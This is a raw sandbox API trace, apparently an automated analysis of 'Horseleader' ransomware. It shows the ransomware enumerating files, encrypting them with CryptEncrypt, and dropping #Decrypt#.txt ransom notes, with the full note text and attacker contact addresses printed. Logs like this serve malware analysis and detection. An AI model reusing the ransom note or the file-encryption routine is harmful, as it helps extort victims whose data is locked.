ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.272] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.272] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\..") returned 68 [0234.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.272] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.272] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.273] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 81 [0234.273] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.273] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.273] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.273] lstrlenW (lpString=".testttjffg") returned 11 [0234.273] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.273] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.273] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.273] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.273] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.274] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\#Decrypt#.txt") returned 79 [0234.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.274] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.274] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.275] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.275] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.275] CloseHandle (hObject=0x158) returned 1 [0234.276] GetProcessHeap () returned 0x780000 [0234.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.276] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0234.276] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0234.276] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned 60 [0234.276] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0234.276] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0234.276] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.276] GetProcessHeap () returned 0x780000 [0234.277] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.277] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*") returned 62 [0234.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\.") returned 62 [0234.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.278] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\..") returned 63 [0234.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.278] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.278] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned 76 [0234.278] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.278] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.278] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.278] lstrlenW (lpString=".testttjffg") returned 11 [0234.278] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.279] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.279] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.279] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\#Decrypt#.txt") returned 74 [0234.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.281] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.281] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.282] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.282] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.282] CloseHandle (hObject=0x158) returned 1 [0234.282] GetProcessHeap () returned 0x780000 [0234.282] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.282] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0234.282] lstrcmpiW (lpString1="TabIpsps.dll", lpString2="Windows") returned -1 [0234.282] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned 67 [0234.282] StrStrIW (lpFirst="TabIpsps.dll", lpSrch=".horseleader") returned 0x0 [0234.282] lstrcmpW (lpString1="TabIpsps.dll", lpString2="#Decrypt#.txt") returned 1 [0234.282] lstrcmpW (lpString1="TabIpsps.dll", lpString2="_uninstalling_.png") returned 1 [0234.282] lstrlenW (lpString=".testttjffg") returned 11 [0234.282] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll", lpSrch=".testttjffg") returned 0x0 [0234.283] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.283] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.283] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0234.283] lstrcmpiW (lpString1="tabskb.dll", lpString2="Windows") returned -1 [0234.283] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned 65 [0234.283] StrStrIW (lpFirst="tabskb.dll", lpSrch=".horseleader") returned 0x0 [0234.283] lstrcmpW (lpString1="tabskb.dll", lpString2="#Decrypt#.txt") returned 1 [0234.283] lstrcmpW (lpString1="tabskb.dll", lpString2="_uninstalling_.png") returned 1 [0234.283] lstrlenW (lpString=".testttjffg") returned 11 [0234.283] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll", lpSrch=".testttjffg") returned 0x0 [0234.283] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.283] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.284] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0234.284] lstrcmpiW (lpString1="TabTip.exe", lpString2="Windows") returned -1 [0234.284] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned 65 [0234.284] StrStrIW (lpFirst="TabTip.exe", lpSrch=".horseleader") returned 0x0 [0234.284] lstrcmpW (lpString1="TabTip.exe", lpString2="#Decrypt#.txt") returned 1 [0234.284] lstrcmpW (lpString1="TabTip.exe", lpString2="_uninstalling_.png") returned 1 [0234.284] lstrlenW (lpString=".testttjffg") returned 11 [0234.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe", lpSrch=".testttjffg") returned 0x0 [0234.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.285] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="th-TH", cAlternateFileName="")) returned 1 [0234.285] lstrcmpiW (lpString1="th-TH", lpString2="Windows") returned -1 [0234.285] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned 60 [0234.285] lstrcmpW (lpString1="th-TH", lpString2=".") returned 1 [0234.285] lstrcmpW (lpString1="th-TH", lpString2="..") returned 1 [0234.285] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.285] GetProcessHeap () returned 0x780000 [0234.285] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 